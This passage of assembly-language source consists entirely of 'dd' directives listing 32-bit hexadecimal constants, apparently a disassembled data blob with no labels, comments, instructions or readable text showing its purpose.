		dd 0E1E5AE5Fh, 0F705C16Ah, 0E5BB23D2h, 0D8C2A676h, 0E9D993ECh
		dd 0CDA9D495h, 5701846Ah, 420277B6h, 5AD11651h,	0FE94C8BDh
		dd 0BC27968Fh, 0C0F80610h, 0FBD1EFD3h, 3B13AC5Eh, 9BA6E85Fh
		dd 0B1820E16h, 9A72D157h, 780AA0AEh, 7FF76E5Dh,	0A4D587D3h
		dd 0A43CE352h, 5F660772h, 10E178ACh, 5D50B2E0h,	2BAF2956h
		dd 8312E7B6h, 901D50F7h, 0A79CF8FEh, 27F7E44Eh,	6E47B44Ch
		dd 9693CB8Dh, 31811D7Dh, 75D883C3h, 0A2DD3272h,	469F5741h
		dd 658B338Fh, 8B99A42Ah, 164A5595h, 89423D51h, 7D1E55C9h
		dd 405B6B0Ah, 5A33DA7Fh, 61F8A795h, 0EDED8DCCh,	5F7EAFD6h
		dd 0DBEB42C3h, 61326D62h, 0C462DC8Dh, 69BDC753h, 5DC6BD67h
		dd 0DE92ABB9h, 0CAA8A21Dh, 8F73AB8h, 15CCEF5Fh,	1AC8594Ah
		dd 260C754Ch, 0EA3FFB78h, 0B548798h, 0CE6E1B7Fh, 409423F3h
		dd 6C57B743h, 0B095DA49h, 274DE833h, 607B7BE3h,	748624F0h
		dd 0F6B9F799h, 0A67F4DD1h, 7A0B8547h, 0FD3C06CEh, 0D35EAF12h
		dd 0C3BE0A57h, 0AD4ACABAh, 637475C1h, 0DFD87E13h, 3CBFAC4Ah
		dd 180BB16Eh, 5B4AEDF3h, 0B438FD4Eh, 72D17A44h,	0B13A9A2Fh
		dd 8025BC1h, 26BBDD4Eh,	5FD84230h, 51021D3Ah, 2D05BF26h
		dd 982DED62h, 1F955D7Ch, 24B45D9Eh, 8CAB5D89h, 75507D74h
		dd 0E8D337BFh, 0B7575F66h, 85E67F66h, 59B235C2h, 59D38FCCh
		dd 9DDE36B6h, 84B9B8F6h, 0F0D73ABEh, 71FB5494h,	5DA258CAh
		dd 9712E2CDh, 4D14F4AFh, 9B28552Eh, 69161FDBh, 0CBF2F78Ah
		dd 0E1685D8h, 213EB597h, 0E8B9740Ch, 26FA954h, 12F4ACE6h
		dd 1B7FC655h, 64199E9Ah, 32C965E8h, 715A202Eh, 0ACEB417Fh
		dd 8D223442h, 2C8D4802h, 0DA0E4AB2h, 673138Ah, 0CACAEF7Bh
		dd 2C0766AAh, 0AC374891h, 0FCD4167Ah, 1E92ED1h,	43E05A69h
		dd 0F09EAA8h, 0B3989A3Eh, 711671E2h, 0DBD7A38Ch, 0D06F831Ch
		dd 0A34C397Ah, 0DEB1EF99h, 57ADA1E1h, 613496CDh, 7B6AB157h
		dd 7E60DE4Fh, 66158B24h, 4DCCA095h, 0D1A85B02h,	0D1B5A703h
		dd 475874FDh, 0F5E65118h, 0DDB640D1h, 6F192537h, 5F6CDE9h
		dd 29A02B16h, 7AA3F9E0h, 0D82D32B2h, 700767FCh,	694FAC42h
		dd 0F1163227h, 98630BC3h, 94011B4Bh, 0CD3F5C95h, 4F31D545h
		dd 0A9EC1E5Bh, 0D9FFCCEAh, 6F9D61F8h, 7301A20Ch, 3269C829h
		dd 7BF8424Bh, 342DFEBAh, 0B6F03C58h, 0E8DBD8D0h, 9A436D8h
		dd 3CB93E09h, 0DDE670F0h, 0A6D3AD1Fh, 0EF1D2FEBh, 0C769BD3Fh
		dd 0C3B83FFAh, 4ABB023Bh, 63567568h, 0B4162DC9h, 66EEC303h
		dd 533290DBh, 3E05A62Eh, 2D3A25F8h, 1A05352h, 5199BD96h
		dd 0A612C227h, 7AF7977Ch, 0CB7989E0h, 881E35DBh, 0FAE29689h
		dd 8BD36338h, 0FF537C47h, 0F6C9308Eh, 0D6CD091Fh, 4A7A30Ah
		dd 0EABFFEE6h, 0D009F76Fh, 7E6F7041h, 35112E58h, 85EE4026h
		dd 0E0287CD7h, 0C143DCB8h, 0D686CBE3h, 1F8A2F75h, 87E2C7D5h
		dd 85781BF9h, 5F36F47Ah, 0C06F8947h, 6B3CF65Ch,	26F6DF90h
		dd 56B1BAEh, 0C292D8C6h, 5B4E5735h, 0C316A9A1h,	0D4DC8C4Ch
		dd 0D2BE73ABh, 870FB829h, 0DDB3F577h, 0A32AC1EAh, 2990F0FDh
		dd 92C5FE54h, 0D97AE195h, 7AB31C83h, 0EE0E1A4Eh, 0D9E16554h
		dd 2F2F6FB5h, 509B9EE8h, 23C95669h, 0C4703E36h,	99F0CFB5h
		dd 3E4EB476h, 0A38614F6h, 46F32E92h, 0F68F597Fh, 4AAED5B7h
		dd 0BFD8AFF6h, 0A4CC7EEEh, 0FC377A65h, 0AC266010h, 0A646DB24h
		dd 8A8DD44Fh, 646EBE96h, 0F006FC5Ch, 0B80F64F9h, 1527EA94h
		dd 2B268D7h, 3F0B9A18h,	0AA69A92Ch, 57B9CC2Ah, 0E3E8F4C7h
		dd 0AB4A8B17h, 94F5E674h, 0D159E2F3h, 4039D72Ch, 1593319Ah
		dd 26E6DE64h, 59282625h, 5F8562D5h, 0DAFDA344h,	0FE07FCF9h
		dd 0F37BD94Ah, 0FEE6CFC3h, 0ACF829A5h, 0FAD02BBDh, 0CA448C5Eh
		dd 7C6BDB2Ah, 2541F650h, 1BEDDDEBh, 993988F2h, 659DDB6Fh
		dd 5B154C5Eh, 567D4CEBh, 6628F67Dh, 5992507Ch, 93472C7Dh
		dd 0DDE802E8h, 0DA0EC56Dh, 0CA6B4AB5h, 0AF9C63B7h, 7FAD4DADh
		dd 5630C616h, 0F4F94E9h, 0F698FC1Ch, 7BF74D5Dh,	8A3C7DA2h
		dd 6410151Ah, 0D16376F3h, 7A7A5F3Eh, 78056917h,	1774CF36h
		dd 60FBB3BAh, 0F083C2DAh, 19F097BDh, 0E5B88BE7h, 8DB60E3Eh
		dd 1DA3F1E2h, 0A43A5379h, 64C27945h, 525D6B16h,	3EF6A4C4h
		dd 0FDB6CA79h, 0BFA38E9Dh, 0DAD774ABh, 0A539107Bh, 0FC1A2B8h
		dd 0E60D1BFBh, 67604D79h, 68E92BD1h, 329A2FEAh,	805F50B5h
		dd 21DC546Ah, 1CECEBCBh, 57D6E4BAh, 233EA34Dh, 0C7077428h
		dd 0B7A0291Ah, 18C4A5BDh, 8A550624h, 31B0256Eh,	0C3A79BD0h
		dd 0B74F50F4h, 65C2E5E3h, 0FAD82A89h, 0BA59E7C0h, 5E26BFAAh
		dd 104155E2h, 0F8739F0Bh, 1B8AEEB3h, 0A02A79C9h, 6BD61D0Bh
		dd 0AAB0B325h, 0F7ABD7EAh, 0F5F09B45h, 412E6057h, 0CDBEFA6Bh
		dd 25AED41h, 72CFC05Ch,	0A5A09FD5h, 4D97352Bh, 2A65D2C4h
		dd 0FB90B717h, 16236081h, 909191F2h, 55DFA8BBh,	59A2A2BBh
		dd 963E119Eh, 3F6321F8h, 7211DA6Dh, 0F81F7CC3h,	4614A272h
		dd 370EEDF1h, 0AB71F21Bh, 0B0BFC0FBh, 0DCBB9D4Ch, 7DB69AF5h
		dd 83BB3316h, 9653B9EDh, 0A3120695h, 1D4E1998h,	0C4253F9Eh
		dd 0BCAB22AEh, 0FCB5EEE7h, 0B89AE7C1h, 5B8CA2B7h, 0DF368FDFh
		dd 12EE8B7Dh, 0FDFFBF79h, 0C145898Dh, 0EB22575Eh, 5A23DE61h
		dd 0A84AB026h, 92620A36h, 46E49A79h, 61A8BD3Bh,	2FF9E04Eh
		dd 0FCBC5521h, 1F69D070h, 0FB74CDCh, 9AF1319Ch,	8AA37B44h
		dd 38CD6B4Bh, 0CC6D6DFCh, 0F7BCF2DEh, 4B3D63F8h, 5539B9B7h
		dd 0F0CC81FCh, 86C296D7h, 5A8EB6ABh, 40565A2Dh,	0F03C2C39h
		dd 0FAAD8E6Fh, 706B19D4h, 170EF25Ah, 0EDFC2623h, 2E1187E0h
		dd 0E1F4E631h, 5DE8B846h, 7FBA7751h, 0FBE7A7Ah,	0E4AB982Ch
		dd 0B6B13510h, 0DDAF77B5h, 87F5953h, 0F7750E41h, 0BE4E787Ch
		dd 99AC7AE8h, 7D42B6E8h, 785B79BAh, 8F0DF3A3h, 0E9120F0h
		dd 481CF0BFh, 57DA60D6h, 26B1695Ah, 0B4345F05h,	0F326E211h
		dd 2653A756h, 0FBDB358Ch, 0CBE03882h, 88AF65AFh, 5BB7FBAh
		dd 0BEF92ED6h, 0B612957Fh, 163FFB34h, 0F2A21C6Ch, 0D2CA3055h
		dd 2462719Bh, 0A466B968h, 0ACE8ACB9h, 7D60324Ah, 58AEA441h
		dd 0A4DBCD42h, 163AB327h, 2932E4D0h, 9406C507h,	0C203D3E5h
		dd 65499EF4h, 17C185AAh, 0CAEDA2F2h, 0B6C31ABFh, 0C0F3159Ch
		dd 0C18BAB5Eh, 9A218073h, 0F87DE0F1h, 0A4380A31h, 615A8B4Bh
		dd 3B658887h, 5F0D91AEh, 0B0E30071h, 0ECF2CA27h, 57CD6BABh
		dd 0EC98A75Dh, 9166A8C5h, 0B174C628h, 0A3EB7DDBh, 607B591Fh
		dd 265FD1FAh, 7AD4BD2Ah
		dd 0F82F1556h, 5277A04Eh, 85B9E952h, 7E0B97A9h,	5EE51A58h
		dd 155541BAh, 0A951CE04h, 0D0A43EFh, 0D4314575h, 0A41A90AEh
		dd 9BE0BCC9h, 0DF6C3C5Bh, 8823505Ah, 0B8276C68h, 1E8D0B0h
		dd 0CFA940B3h, 0D253AFBCh, 0F5B0FEBAh, 0DB883EF9h, 0C54C047Dh
		dd 6E7E8165h, 937C3F4h,	0DE4AE684h, 0AD4836CDh,	985A83BFh
		dd 0D4B9E2AAh, 7FEA70B8h, 0D2614F95h, 0A53DB8E1h, 56B4F80Eh
		dd 7D157C50h, 0F2D586Eh, 4AF4F49Fh, 866811BBh, 7653EED1h
		dd 0DAEB37EFh, 0AF61C44Dh, 5653AA9Fh, 57173937h, 0CF271AD0h
		dd 0DC02F775h, 0B43B29E8h, 41B2EC8Dh, 0C9F5EEBh, 6DD59EA5h
		dd 0D9CEB751h, 341EFEDFh, 3104AA7h, 0D0AB9B3Ch,	1159053Dh
		dd 41373133h, 0F7C59BAFh, 0A43627D6h, 0F044D98h, 0A3BA9A0Ah
		dd 40C2BF2Ah, 0A2C0D2F8h, 9317E543h, 73D976Ah, 0EC5BA28Bh
		dd 0B87677E6h, 0CF777126h, 27DFD6D2h, 5D5CC0FCh, 66C3FE5h
		dd 96A71E50h, 17708B62h, 2BF7A8A1h, 5A12D0A9h, 586BBA9Eh
		dd 5AE1948Fh, 4AF9733Fh, 0FC0E8467h, 2270A330h,	3F851E90h
		dd 66913DF1h, 7C4E61BDh, 5F8D4630h, 4BF485A3h, 53A5501Dh
		dd 7862A153h, 0CE357DD7h, 67804624h, 0ED6FDA7Bh, 1B16AB3Bh
		dd 2385C729h, 7DA30592h, 6AEAE5AEh, 26905688h, 25FA999Dh
		dd 5085EC20h, 48C355D5h, 7831A63h, 6CBE7EB6h, 6B48CCC1h
		dd 0FD7AAA81h, 56652927h, 0ABA40D56h, 0E566238Eh, 42983572h
		dd 3D1AA60Ch, 0E5DD9DC6h, 0BA8352E9h, 9575CBABh, 24BA6331h
		dd 0C682E625h, 4C578534h, 0A3ABCAEBh, 0C8611C4Fh, 0CB592018h
		dd 0DCCE711Fh, 0BD97D0E3h, 0AE0E0E62h, 0A7AC6660h, 25153295h
		dd 33FDC0FAh, 0BB595498h, 558F692Eh, 7C2D2117h,	9383547Ch
		dd 0A4E7C761h, 2731F2BEh, 0BA814838h, 0A5681117h, 6A91B4CAh
		dd 0A8AED1C0h, 46B62698h, 0F86A07D5h, 0D9DD5F1Ch, 723A5CDh
		dd 0A58C6776h, 20320A85h, 0B4E5B3EEh, 47C10C8Ch, 0FB02A353h
		dd 0FD50E65Ch, 0B9DE97DFh, 0CAB9BF9Fh, 0E2E8A82Fh, 0D40879ECh
		dd 6036A73Eh, 6D5F0E00h, 2A764F25h, 57C1DF54h, 0D43D8AC5h
		dd 374C8D5Bh, 65F8EC77h, 35655B22h, 0E6C67378h,	0B2B27D2Bh
		dd 4B96C09Dh, 51DF8A8Dh, 3BF32853h, 15F53205h, 10BC7BDBh
		dd 0AD4F97A8h, 981FDDBCh, 0F185752Fh, 0F86F9C4Fh, 0B6AAD2FDh
		dd 3656A85Eh, 0EEAD3CEFh, 9C9FF3D9h, 496B20A0h,	4333ECE7h
		dd 640FA4C1h, 0B5301536h, 54D3A627h, 0B552030Dh, 0B9F3C2B9h
		dd 4407077Fh, 71BECEEEh, 0FCAF2B82h, 1485D235h,	595DDA39h
		dd 7DFA77B6h, 975AC5B4h, 6162FF71h, 3AB52AA6h, 0F296A7CFh
		dd 4D90854Bh, 9472E0Ah,	427DE0DAh, 0D1EBE47Ch, 190FD079h
		dd 72A3154Ah, 41D95646h, 0B6D95EAEh, 0F4AE342Ch, 0CA8BF995h
		dd 0A53B8E55h, 5FC66369h, 0C246BAE9h, 0E76D1F8Ch, 80621F7Bh
		dd 232BD2BAh, 0D12B2808h, 0D501A975h, 0C31D0F64h, 3616789Bh
		dd 0D3AE43A5h, 248A88BCh, 0D7C56B17h, 0C598E80Bh, 67C66251h
		dd 55959F7Ch, 0FA5CD2C5h, 0B9061B20h, 71612947h, 5C0F0711h
		dd 0E6816CF1h, 188F8323h, 0DD2D482Dh, 0E364C3BFh, 0B7DA5287h
		dd 1CE9B517h, 5A232CAAh, 0F1E72AB7h, 0B5EE3432h, 32FF4198h
		dd 9E2E3CF7h, 234A9CBDh, 85A1FE3Dh, 7AF705A2h, 7F3FA2A2h
		dd 0CA33981Fh, 0A5617399h, 56A90E98h, 8C0B34A1h, 7E011FA5h
		dd 6883477Dh, 4755D3CFh, 0CBE6C4A3h, 0DE96D663h, 5E6C1F03h
		dd 9DC15DEFh, 82E9E4AFh, 3BA2F6BAh, 7F9A2533h, 9B9DFA36h
		dd 0D38FDAFEh, 0B5C8DB5Dh, 0EE65B7D5h, 0F0E19C7Dh, 0E8294F62h
		dd 1F836756h, 3ABAACB6h, 69BF3594h, 0B6E2E5E6h,	0B510AB62h
		dd 9D4D40BBh, 0AED1D68Bh, 0E0F9896h, 0F7E37131h, 7D252607h
		dd 0AD95C4A7h, 79505A7Bh, 356D2B45h, 9FDB7B69h,	20FB4829h
		dd 0B3BAB445h, 0EBFFD8Fh, 1EC4CB8Ch, 2E149A43h,	59DCADD7h
		dd 0CE278A60h, 0A1DD2998h, 0EC940B16h, 9A35756Eh, 3850990Ch
		dd 0EFEF2C19h, 39B16DA4h, 8F458981h, 4D3CB59Bh,	3A047569h
		dd 0D1A63DB5h, 5FD5EBF3h, 0C6FD6AE9h, 81E3EC4Bh, 939F1C31h
		dd 7517736Dh, 0F317597Fh, 0BB3F71C7h, 30EAFF6Dh, 317F6910h
		dd 181F5963h, 0D79B4D62h, 0DDF49D17h, 5D66ECC0h, 0A0419489h
		dd 0E217D14Bh, 0D3015FBCh, 8A1108C3h, 0ED3006A5h, 41DBE852h
		dd 17C953C0h, 0B35D2A34h, 27995385h, 3AAD987Eh,	0A371C3FFh
		dd 59DF84B5h, 0BA087E75h, 95F7B52Eh, 20E90A2Eh,	4722137Eh
		dd 7918FB2Ah, 8F2A1EA4h, 0C18DFD2Bh, 0FC6A425Bh, 0E96E6A7Eh
		dd 0BCC5EC47h, 333C4B13h, 2B9CFED9h, 0EB3B93CBh, 2F892D87h
		dd 0C128F7F9h, 0ED26B9B4h, 0C841B1CCh, 2CD28A14h, 0B2F1EFCh
		dd 1B44B5B4h, 57BDB645h, 0F599F947h, 322122A5h,	72364499h
		dd 0B91FB7F2h, 5A1A3B4Dh, 0E4BB9731h, 44A64535h, 75812A27h
		dd 0AE7A49B8h, 172222FBh, 5F0E6EB9h, 0DC2AF81Fh, 60BC7161h
		dd 2377F74Dh, 8943573Ah, 0FB40ED6Ch, 61CBF11Ch,	37EEA662h
		dd 539CBC49h, 0B6BF5EF9h, 492CEBFCh, 0F92EBB06h, 0D63A9077h
		dd 0FD567075h, 0E607C7E1h, 0F09A060Ch, 24D2F591h, 6D2DCFADh
		dd 2DA67540h, 145910D7h, 0F912ACE3h, 55304B57h,	0D197A93Ch
		dd 313FDE94h, 2964EB0Dh, 0EECC0CFAh, 7597B159h,	7250D992h
		dd 3CFC469Eh, 0D542CE5Ah, 607E2F6Dh, 70D9E083h,	17D746E5h
		dd 0AD9253BAh, 0C5DC697Fh, 3B47CEB8h, 0DB4AF58Ch, 128B7A03h
		dd 0E845ED40h, 8CCBBBF2h, 0ADFCBFh, 8CA918C7h, 79E12244h
		dd 0ADAF0980h, 7F2BEF62h, 0AA4A4794h, 0DAF01BFBh, 0A04896Eh
		dd 6DC8A76Ah, 1EC4DF8Bh, 0D2297F5h, 5E017629h, 8CFD98BFh
		dd 8F81DE36h, 21969E1Fh, 0B7F3719Fh, 24FA6B11h,	5F53BA2Ah
		dd 0B6DB6399h, 6D1AD99Dh, 0A66FBB53h, 17117C1Ch, 5A3E8B48h
		dd 0BD8AC4E6h, 0FEBE396Bh, 546D2796h, 0AED6A790h, 3AAB187Fh
		dd 3695465Ah, 6EE35C29h, 0FD0531D2h, 3832E846h,	0AD157BDAh
		dd 0C34EAADDh, 4FA6270Fh, 8B19F06Dh, 0D70EF297h, 5C6D79ECh
		dd 2E96A9DEh, 0EDF43AA8h, 81038E2Ah, 8C26A647h,	0F5E57DF8h
		dd 8E34F296h, 172B4CC6h, 80CF2E74h, 0A5FD5BD5h,	351F5FA1h
		dd 9F9F1D5Dh, 27ADB65Fh, 0DC71B6FFh, 582D2DA3h,	28F17850h
		dd 352C19DFh, 8592F9E4h, 0D7D286E2h, 6C9FC148h,	73921F6Bh
		dd 5869FB5Bh, 91AE3451h, 98184129h, 0B7B1FC2Bh,	8D03C352h
		dd 5854766Fh, 529332A9h, 0E660DBEFh, 9B5C0D8Ah,	0C8F9795Ch
		dd 0C2F26ADEh, 4CEBA79Ah, 2BA92B2Dh, 2AC6A6E2h,	5CE19521h
		dd 32994AD1h, 543FD8CBh, 9CA652Fh, 7F35F335h, 39809E4Bh
		dd 0CBE810C0h, 0C5B422FFh, 0F1FEFDC3h, 8A404B7Dh, 28AB82D5h
		dd 0B6CDE15Ch, 0ED698EB9h, 0FA1E3BA3h, 3A6BB7EBh, 0CD3BCE63h
		dd 26E4F68Eh, 33BA9D97h, 0F3302576h, 207EB54h, 0F610877Fh
		dd 0CABD17F4h, 1AED94AFh, 0F5E39BF0h, 73576B8Eh, 0FD483B99h
		dd 2719CA2Fh, 36E88CE8h, 5D2AE3Bh, 5BDBA359h, 50BA0A2Ah
		dd 4C1622D3h, 1DE2F612h, 35E3644Ch, 898F203Ch, 54572A09h
		dd 0FE1FD4E1h, 488F2C5Dh, 77038EB5h, 12DC8C07h,	0E142C090h
		dd 0D43AAE87h, 0FBDB6FB6h, 0FD7ADC99h, 0E007667Eh, 1CEEDAFDh
		dd 0E6AE2BF5h, 4B4B1558h, 8DF0303Ch, 57DFA9A3h,	62807CB0h
		dd 2EF2BE64h, 9D7EA9DAh, 0FC6CFF18h, 8665B850h,	401C47FCh
		dd 0F03E5CC5h, 0C2BBF8F0h, 0C9BF1E77h, 4B83192Fh, 8C637434h
		dd 603498Ah, 0A9EA21EAh, 2E939E3h, 2A4C1FDCh, 0F200971Bh
		dd 0B5A80EF6h, 0F8A84EEEh
		dd 12705096h, 0C0EDCA89h, 7815DF52h, 96E46D55h,	0C0271462h
		dd 4EA55318h, 0AD1C9015h, 5AC418A9h, 0A5F354A2h, 2D67AC3Dh
		dd 7E1E1750h, 6A81D138h, 0A636539Fh, 6A082116h,	0BBFA0946h
		dd 99997D2Fh, 4AE757F4h, 13B9032Dh, 990F3DC9h, 0AA041C1Bh
		dd 7BD1C41Dh, 7435FD15h, 0D94AD6Eh, 43B01BD4h, 27281FD1h
		dd 0E9F0FC2Dh, 0DD68CBBDh, 1966D2B4h, 9D88ED8h,	0F0C794CEh
		dd 0C3BD362Fh, 25B3C11Fh, 360F3A56h, 0B155A3EFh, 0DA377F9Eh
		dd 0EF1D8454h, 5048989Fh, 0D3BB4978h, 81E57B6Ah, 71AC8A95h
		dd 0D16EE976h, 8216B382h, 574FDB6Fh, 6268A343h,	731388F8h
		dd 313E3D6Dh, 0BEB7A46Bh, 0AA8CBC3Dh, 43F2A154h, 38AC9C20h
		dd 6DD85731h, 0F8D9AF24h, 0D82ED94Ah, 47CFCE09h, 97FD07D4h
		dd 7E41EBE9h, 747157E7h, 0CB8C7EBFh, 0C1330FCh,	3D7AC306h
		dd 186F7BBh, 5D8AEDDBh,	5EC23DEBh, 0F30A3F5h, 5E574315h
		dd 4AA31A78h, 284AF1AAh, 5DAEFE5Dh, 0CEA18F6Ch,	0DB8B84FBh
		dd 0AC36F80Dh, 0AF8B5361h, 0BD0C8887h, 7DFCBC54h, 0FB309506h
		dd 98AC2E72h, 0A84FEFC6h, 0E88C3279h, 0EDA2B154h, 7EE4ACB9h
		dd 8D52E13Ah, 9F45331Ah, 8EAC85B7h, 83F9DC67h, 0B48914D6h
		dd 0B9E3CABAh, 0F89E3A04h, 8B91A660h, 0C2D10757h, 0E025F7B3h
		dd 315C2D99h, 0EB91EB21h, 0EF2F9AACh, 0BF2B1B52h, 0BDFD62E4h
		dd 0D93858F6h, 0A226E5Ch, 80B90D5Ah, 0EA0E160Fh, 0D1CEC7BDh
		dd 0BC39D54Ah, 0A0FC88AFh, 111BC4C1h, 0EFE1B11Ah, 32D10C2Ch
		dd 41E2F06h, 1E04549Ch,	4B344CEh, 0D794F90h, 85FAFC6Fh
		dd 0F8D9BDE1h, 99A6F821h, 0CC61647Dh, 1366DB31h, 89F8B04Bh
		dd 156807FBh, 0B4FECF9Dh, 757E8EC6h, 51202F6Eh,	0ADCB2EABh
		dd 51BACD2h, 6B039D49h,	0E3A13D9Fh, 0F49BF2C8h,	9D7CDAE1h
		dd 4B4F291h, 9CB51CCBh,	0D23B1026h, 7144F455h, 0B6489D55h
		dd 0EAD5ADB7h, 7DD48CDh, 0A93E374Ah, 0C8C25EF4h, 5EE61B03h
		dd 7D12E4BDh, 6488770Fh, 3ED1A38Fh, 895D8E78h, 59B947A9h
		dd 8CC42CF9h, 0D74DD9DDh, 0AAB795CCh, 0E8CE9C84h, 0A5061163h
		dd 0C23FF88Fh, 7CA41DEAh, 4A7587B2h, 0FCCA63FCh, 22B96B66h
		dd 0B8BC3CBFh, 5D0880B8h, 0DEDDB791h, 6D3562D1h, 0B3C154E4h
		dd 0B03C27C6h, 52B4E341h, 5AADEFE5h, 0F54BB853h, 0F19662Dh
		dd 483AC054h, 2E865762h, 0A960BB9h, 43EC07BBh, 0DF98E79Dh
		dd 0A057ECF3h, 0B543EB88h, 15927257h, 3D57CE7Fh, 28535965h
		dd 0FE52E3C2h, 7B39DB62h, 85CE8BF0h, 1CE36A2Ch,	0D86F0A8Ah
		dd 6A3FEDA6h, 51A45B94h, 0AC925F9h, 7469CCFAh, 0FEE28D9Dh
		dd 0B52F3384h, 3A441737h, 0BF751440h, 1B5F25EAh, 5F8D0A3Ch
		dd 0FDAB775Bh, 0CE2EC0E7h, 3304297Ah, 86C870BAh, 3DCDC161h
		dd 560B607Ch, 0F1777D59h, 0F0FE4A14h, 931B044Bh, 0BEA6A681h
		dd 68AFD2E9h, 9175EBC7h, 0F9D571ADh, 19240293h,	5F27DEC1h
		dd 0D69F37F7h, 0AB12AD6Ch, 0BDECA3h, 0D52B59Bh,	0D8C72C30h
		dd 6B7F74DBh, 0AAD3A2B8h, 9D50C6FDh, 0FE7D1124h, 0B1E3825h
		dd 3343F94h, 37BA6387h,	0CA9A52F7h, 75DAF354h, 12777932h
		dd 0E8F49E70h, 1E4A1DC1h, 0A6267838h, 9D9C40Eh,	0E7E2DBECh
		dd 286AC62Eh, 0FD2787E2h, 0BDE70449h, 0BDA35DC2h, 7DD9D388h
		dd 8CD2916Dh, 4A6927B6h, 687826F6h, 343F133Dh, 8E1392Bh
		dd 1CA67DD9h, 0C923CCCCh, 15A5C22Ah, 131273E3h,	13B476F4h
		dd 0FC64EA01h, 1B7D6990h, 0CC756BB0h, 94D19BB9h, 0F0D51CE2h
		dd 965F395h, 0A19D43B9h, 0FDFA89BEh, 4C4A5C0Ah,	0B74BDC1Eh
		dd 1F1556F4h, 9C92A698h, 95F9FEB5h, 0DB92B924h,	0AAC68BEEh
		dd 18FE412Eh, 0D9EB191Dh, 636C8C71h, 0F8DE333Ah, 866A8D96h
		dd 7742275Eh, 56865D4Ch, 0ED3641BBh, 5DE92348h,	5FDE947Dh
		dd 0AACC3B39h, 0B6D39E86h, 0D68ED9E4h, 30C675A8h, 0B6D1DAA5h
		dd 0F151A3D0h, 0A4F7AE1Dh, 3E8D922Ch, 2D27F726h, 0B12A4CF2h
		dd 966412CBh, 3379A4FDh, 8664EEE1h, 0E256D7DFh,	9436FF73h
		dd 55ED8FC5h, 0E48CF2B5h, 0FCF368DBh, 0A87EFED0h, 53657C98h
		dd 5F090A6Fh, 4902C93Ch, 0F8399CFDh, 9905F9C2h,	0A10AC3FDh
		dd 0FBF4D975h, 23E9B38Dh, 368E98E1h, 0C2254614h, 44C69D58h
		dd 0A56169C8h, 0FB2A2658h, 0CEF1F9A2h, 5910E4A4h, 4F3542CCh
		dd 0C503D64Ah, 0A8AA4D0Dh, 0E7F77B09h, 69EC3A07h, 1CF7303Ch
		dd 0EB2C82C5h, 0C56D4D4Ah, 0AA985FCh, 7BF21D19h, 16A24B99h
		dd 48C1B9F0h, 0E63FCBA7h, 1C41B91h, 0CE9C1349h,	0C7B6AEE1h
		dd 1B685EE7h, 7E8CF998h, 0BD5FF4C1h, 2D84A9Eh, 5ED845CEh
		dd 53251F1Dh, 5B7C88A6h, 0C16E2C03h, 56B4A47h, 90C04135h
		dd 0FD532CBEh, 0B59B2529h, 511EC74Ah, 57C9598Fh, 0C37329F7h
		dd 0DB5DC0FDh, 0F87E7045h, 9A56243Dh, 0DEBA26DFh, 687B9F19h
		dd 0DF1B862Dh, 0C319ED37h, 39B846E1h, 81F094Bh,	0D5441666h
		dd 0FED7D394h, 2D1A66ABh, 68CC6257h, 0C22256Eh,	4EBF974Dh
		dd 90277BF2h, 0BE5A772Ah, 0F5416D2Dh, 63E0A02Ch, 23EC10B4h
		dd 0CD597D5Ah, 0C95E538Ah, 90F4B97Fh, 2F59B73Eh, 56DFA7FBh
		dd 0E808A9F6h, 5D776933h, 5C971F5Ch, 6A1E87C7h,	5DC591B0h
		dd 0DFD8F8A0h, 3118E9CEh, 12555A70h, 0AEAAF8E0h, 560B5483h
		dd 38BAFA61h, 76ECEF8Bh, 8D066358h, 4606B0D0h, 937A90BFh
		dd 4CB4B388h, 4B771B1h,	0FD5708D7h, 42BAF3CEh, 7B9BD0ADh
		dd 987A8519h, 0FE1EBEF3h, 0C37538FEh, 4A573D8Ch, 0D6F13DC4h
		dd 0F2408636h, 1C5097D1h, 177D1A2Dh, 3715B46Dh,	0CE9545E5h
		dd 0C2D7B9DBh, 89FAE7A4h, 90B9E854h, 294DF86Ah,	25361671h
		dd 7852E284h, 1EDE9660h, 0EAA8D2Ch, 82F3ACBDh, 0C1B205D6h
		dd 0AA081F5h, 0F8E23109h, 75DFD5DEh, 61A2AF97h,	492A5D64h
		dd 0F6126BEEh, 38A82B26h, 0F9BA924Eh, 0D7D2A3D0h, 0EE3AAE27h
		dd 26860B72h, 1311ED1Ah, 0E21892CAh, 0AE799D62h, 0B3501E4Dh
		dd 0E8355DE2h, 6E5A7CF5h, 0A2AA8C69h, 0DE5C3ABDh, 548576C7h
		dd 14063CEBh, 736BDF34h, 22FA0ECEh, 0E991516Dh,	2F363BE3h
		dd 0AEC4D9E3h, 21F8AB22h, 0C0419262h, 4C4979DAh, 8B4952B4h
		dd 7DAACCBCh, 944985AAh, 6829ED34h, 0B20D6991h,	2D287E57h
		dd 4BE71C5Ah, 2D28D3E9h, 3A5A6175h, 954F4EFBh, 8F40717Fh
		dd 0A7500516h, 0E201F955h, 95564AB0h, 0B4F58AB3h, 0E877439Bh
		dd 8CE0F853h, 4654ED78h, 1049F456h, 3877CE14h, 3B262933h
		dd 133DF1A9h, 0B2380594h, 426A685Ch, 19B8ABDDh,	0A474A53Dh
		dd 68F14E72h, 0F84FC5CEh, 65E118E5h, 3DFE17FDh,	0E1F88E82h
		dd 1851A66Ch, 552D4D06h, 0AFBDCE4Ah, 0DCDB3529h, 83D67EA7h
		dd 91A217C6h, 43BFA0B6h, 29337C1Eh, 0F8F980F1h,	3ABEC368h
		dd 0D059E868h, 0A2B49AAFh, 0E5A28B30h, 0DF4BDC18h, 88053255h
		dd 29730AA5h, 260B1A4Ah, 6A450D4Eh, 0D4937852h,	74CC7E80h
		dd 0BE39D4D7h, 3CE3B155h, 0AA8B7F87h, 7FD36ADEh, 38BE7E77h
		dd 116CF05Ah, 0E9ACFE0Ch, 0DB335485h, 76814598h, 8FA3D0ABh
		dd 45EE921Ah, 691EB982h, 4622B449h, 76428858h, 0BA782BF3h
		dd 18785BA9h, 4D6FF7BEh, 0CA3082F1h, 0B7E1DDD2h, 0BBDB1077h
		dd 0CD8C7B77h, 0FBE266Ah, 16096159h, 0B2F3F94Fh, 0BCF6CF02h
		dd 0F3CEF03Ch, 0AF7FD697h, 0F7692D89h, 1524BF1Dh, 12903D4Eh
		dd 0F2EE5EE9h, 6864F0E7h, 76B6DC07h, 9D4E9D64h,	0FCCFA2FEh
		dd 7405DB4Ah, 0D2CA0737h, 8C77B95Ah, 36E431F0h,	860FBF1Fh
		dd 0B20C6EE4h, 0F6FF1D7Fh
		dd 0D0FC7528h, 0F4246234h, 8E526E97h, 17EBE738h, 0E06674CBh
